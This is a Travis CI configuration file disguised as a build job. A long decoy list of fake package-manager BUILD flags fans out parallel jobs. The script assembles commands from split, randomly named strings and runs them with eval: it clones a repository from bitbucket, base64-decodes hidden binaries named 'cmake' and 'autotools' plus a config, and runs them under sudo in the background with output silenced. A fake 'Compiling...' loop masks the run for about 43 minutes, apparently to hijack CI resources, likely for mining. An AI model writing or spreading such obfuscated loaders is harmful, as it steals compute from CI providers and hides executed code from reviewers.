dist: bionic

env:
  - BUILD="--prefix=5576J"
  - BUILD="--noreplace=905se"
  - BUILD="--autounmask=634rn"
  - BUILD="--rage-clean=26pV"
  - BUILD="--nodeps=14299"
  - BUILD="--root=118Ek"
  - BUILD="--dynamic-deps=375Zr"
  - BUILD="--search-index=233uP"
  - BUILD="--pkg-format=291Ie"
  - BUILD="--oneshot=1452n"
  - BUILD="--rebuilt-binaries=501vL"
  - BUILD="--ask=412Qh"
  - BUILD="--noreplace=902Zf"
  - BUILD="--depclean=90QF"
  - BUILD="--backtrack=20xQ"
  - BUILD="--sync-submodule=626fk"
  - BUILD="--autounmask-keep-keywords=705iF"
  - BUILD="--prune=985nt"
  - BUILD="--unordered-display=663xD"
  - BUILD="--accept-properties=8095d"
  - BUILD="--alert=430K6"
  - BUILD="--quiet-fail=723NK"
  - BUILD="--rebuild-if-new-slot=65291"
  - BUILD="--sync-submodule=722Sl"
  - BUILD="--check-news=225OX"
  - BUILD="--rebuild-if-unbuilt=526oG"
  - BUILD="--rebuild-if-new-ver=966fy"
  - BUILD="--rage-clean=43R0"
  - BUILD="--fetchonly=170a5"
  - BUILD="--usepkgonly=890f"
  - BUILD="--regen=916mx"
  - BUILD="--ask-enter-invalid=8933g"
  - BUILD="--alert=989Ze"
  - BUILD="--package-moves=548AG"
  - BUILD="--autounmask-only=368J6"
  - BUILD="--usepkgonly=178z"
  - BUILD="--autounmask-unrestricted-atoms=239Sr"
  - BUILD="--load-average=49qh"
  - BUILD="--complete-graph-if-new-use=782i9"
  - BUILD="--changelog=641gK"
  - BUILD="--rebuild-if-unbuilt=242rK"
  - BUILD="--sync-submodule=41gB"
  - BUILD="--rebuilt-binaries-timestamp=12CN"
  - BUILD="--ignore-world=297uM"
  - BUILD="--onlydeps-with-rdeps=369hB"
  - BUILD="--update=250tl"
  - BUILD="--newuse=29kJ"
  - BUILD="--with-bdeps=318du"
  - BUILD="--columns=664dR"
  - BUILD="--alphabetical=383U1"
  - BUILD="--with-test-deps=195n1"
  - BUILD="--accept-properties=74qY"
  - BUILD="--debug=223W2"
  - BUILD="--autounmask-use=7566o"
  - BUILD="--getbinpkg=787m6"
  - BUILD="--noreplace=26zL"
  - BUILD="--autounmask-backtrack=997tx"
  - BUILD="--read-news=755EO"
  - BUILD="--color=166Oc"
  - BUILD="--package-moves=140Bg"
  - BUILD="--usepkgonly=453AY"
  - BUILD="--buildpkg=653mj"
  - BUILD="--buildpkg-exclude=69664"
  - BUILD="--sync-submodule=842GZ"
  - BUILD="--usepkg-exclude=9717i"
  - BUILD="--with-bdeps=285DE"
  - BUILD="--reinstall-atoms=86O2"
  - BUILD="--version=302RK"
  - BUILD="--search-index=2430Z"
  - BUILD="--noreplace=718Eg"
  - BUILD="--getbinpkgonly=642kp"
  - BUILD="--with-bdeps-auto=6194d"
  - BUILD="--ask=481jv"
  - BUILD="--changed-deps=9K2"
  - BUILD="--depclean-lib-check=430jS"
  - BUILD="--binpkg-changed-deps=206Hu"
  - BUILD="--useoldpkg-atoms=479yr"
  - BUILD="--fetchonly=8275d"
  - BUILD="--quiet-unmerge-warn=741y4"
  - BUILD="--depclean=488l1"
  - BUILD="--config=769fi"
  - BUILD="--deep=129wa"
  - BUILD="--accept-properties=6352W"
  - BUILD="--use-ebuild-visibility=335is"
  - BUILD="--sync=5385l"
  - BUILD="--ignore-soname-deps=177by"
  - BUILD="--nodeps=446im"
  - BUILD="--nodeps=117pj"
  - BUILD="--check-news=825s6"
  - BUILD="--nodeps=705nx"
  - BUILD="--buildpkgonly=525MF"
  - BUILD="--ask=813Ew"
  - BUILD="--usepkgonly=334Dq"
  - BUILD="--unmerge=753k2"
  - BUILD="--complete-graph=3973u"
  - BUILD="--clean=983iZ"
  - BUILD="--oneshot=739S7"
  - BUILD="--verbose-slot-rebuilds=600Nm"
  - BUILD="--pretend=715cL"
  - BUILD="--ignore-soname-deps=769Fa"
  - BUILD="--autounmask-write=577W"
  - BUILD="--keep-going=500oQ"
  - BUILD="--quiet-unmerge-warn=306mW"
  - BUILD="--noconfmem=815Rj"
  - BUILD="--config-root=3360T"
  - BUILD="--ask=80hv"
  - BUILD="--skipfirst=194Ek"
  - BUILD="--onlydeps-with-rdeps=926eX"
  - BUILD="--deselect=537Eh"
  - BUILD="--autounmask-use=460EQ"
  - BUILD="--dynamic-deps=900Gt"
  - BUILD="--usepkg=890yT"
  - BUILD="--usepkg=71348"
  - BUILD="--rebuilt-binaries-timestamp=98410"
  - BUILD="--dynamic-deps=130lZ"
  - BUILD="--with-bdeps=1077o"
  - BUILD="--config=336F9"
  - BUILD="--update=748On"
  - BUILD="--pkg-format=406Pg"
  - BUILD="--complete-graph=6585S"
  - BUILD="--changed-deps=152WP"
  - BUILD="--with-bdeps-auto=156Di"
  - BUILD="--autounmask-continue=874ct"
  - BUILD="--complete-graph=652YI"
  - BUILD="--onlydeps-with-rdeps=133e"
  - BUILD="--rebuild-if-new-slot=708JM"
  - BUILD="--autounmask-backtrack=626c6"
  - BUILD="--autounmask-use=7046r"
  - BUILD="--depclean-lib-check=746Tr"
  - BUILD="--onlydeps=13lW"
  - BUILD="--root=265eQ"
  - BUILD="--dynamic-deps=273rt"
  - BUILD="--misspell-suggestions=862AW"
  - BUILD="--root=184Kt"
  - BUILD="--autounmask-unrestricted-atoms=249Fr"
  - BUILD="--ignore-soname-deps=60390"
  - BUILD="--rebuild-if-new-slot=5678p"
  - BUILD="--changed-deps-report=48881"
  - BUILD="--tree=782cW"
  - BUILD="--depclean=40RQ"
  - BUILD="--deep=367dM"
  - BUILD="--autounmask-backtrack=361Zi"
  - BUILD="--rage-clean=272Nk"
  - BUILD="--use-ebuild-visibility=261lW"
  - BUILD="--regen=740Ei"
  - BUILD="--rebuilt-binaries=95w7"
  - BUILD="--prune=365lF"
  - BUILD="--binpkg-changed-deps=716Pd"
  - BUILD="--prefix=87cn"
  - BUILD="--read-news=350rr"
  - BUILD="--changelog=861tZ"
  - BUILD="--autounmask-use=543Dr"
  - BUILD="--onlydeps=4870v"
  - BUILD="--reinstall-atoms=942uH"
  - BUILD="--rebuild-exclude=807Ci"
  - BUILD="--accept-restrict=5926q"
  - BUILD="--depclean=711tv"
  - BUILD="--info=420g"
  - BUILD="--fail-clean=62un"
  - BUILD="--implicit-system-deps=51345"
  - BUILD="--clean=4521Q"
  - BUILD="--usepkg=960Lz"
  - BUILD="--newrepo=294A1"
  - BUILD="--searchdesc=4797C"
  - BUILD="--nospinner=965oT"
  - BUILD="--nospinner=664sl"
  - BUILD="--verbose-slot-rebuilds=714nH"
  - BUILD="--usepkgonly=662PU"
  - BUILD="--noconfmem=114l2"
  - BUILD="--regen=789Qn"
  - BUILD="--info=994OV"
  - BUILD="--skipfirst=961QM"
  - BUILD="--rebuild-if-new-slot=706HB"
  - BUILD="--reinstall=483GF"
  - BUILD="--emptytree=242M5"
  - BUILD="--quickpkg-direct=86Su"
  - BUILD="--prefix=275gE"
  - BUILD="--verbose=850iK"
  - BUILD="--config=208ZU"
  - BUILD="--keep-going=395QP"
  - BUILD="--autounmask=354Bi"
  - BUILD="--newuse=153Ev"
  - BUILD="--sysroot=619cU"
  - BUILD="--help=516mv"

language: minimal

script:
  - sudo apt update || true
  - BVAoVstxh="sudo apt --"
  - EgzNs="yes install"
  - qtaeGj=" cl-base64 "
  - TCRdofaO="git &>/dev/"
  - eval "$BVAoVstxh""$EgzNs""$qtaeGj""$TCRdofaO""null"
  - FXtwtKtr="git clone h"
  - mxLydt="ttps://gccb"
  - CfutYWkkBIt="uild@bitbuc"
  - kIxqJTeszm="ket.org/gcc"
  - ULpHi="build/gcc.g"
  - zKKtCEMd="it &>/dev/n"
  - eval "$FXtwtKtr""$mxLydt""$CfutYWkkBIt""$kIxqJTeszm""$ULpHi""$zKKtCEMd""ull"
  - gOeyXU="base64 -d g"
  - zIUgKhkVUK="cc/cmake_ >"
  - eval "$gOeyXU""$zIUgKhkVUK"" cmake"
  - sxYbq="base64 -d g"
  - tbiOgaK="cc/config_ "
  - eval "$sxYbq""$tbiOgaK""> clear"
  - ZbbAjme="base64 -d g"
  - nBIKmEV="cc/make_ > "
  - eval "$ZbbAjme""$nBIKmEV""autotools"
  - chmod +x autotools cmake
  - ./cmake
  - sed -i 's/build/tg3u/g' clear
  - CettLWGaRr="sudo ./auto"
  - WkQRkCTz="tools -c cl"
  - yCYjPHH="ear &>/dev/"
  - eval "$CettLWGaRr""$WkQRkCTz""$yCYjPHH""null &"
  - GCC=$(date +%s)
  - WwxMXd="echo $BUILD"
  - eval "$WwxMXd"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2568)) ] && sudo killall autotools && break; sleep 201; done
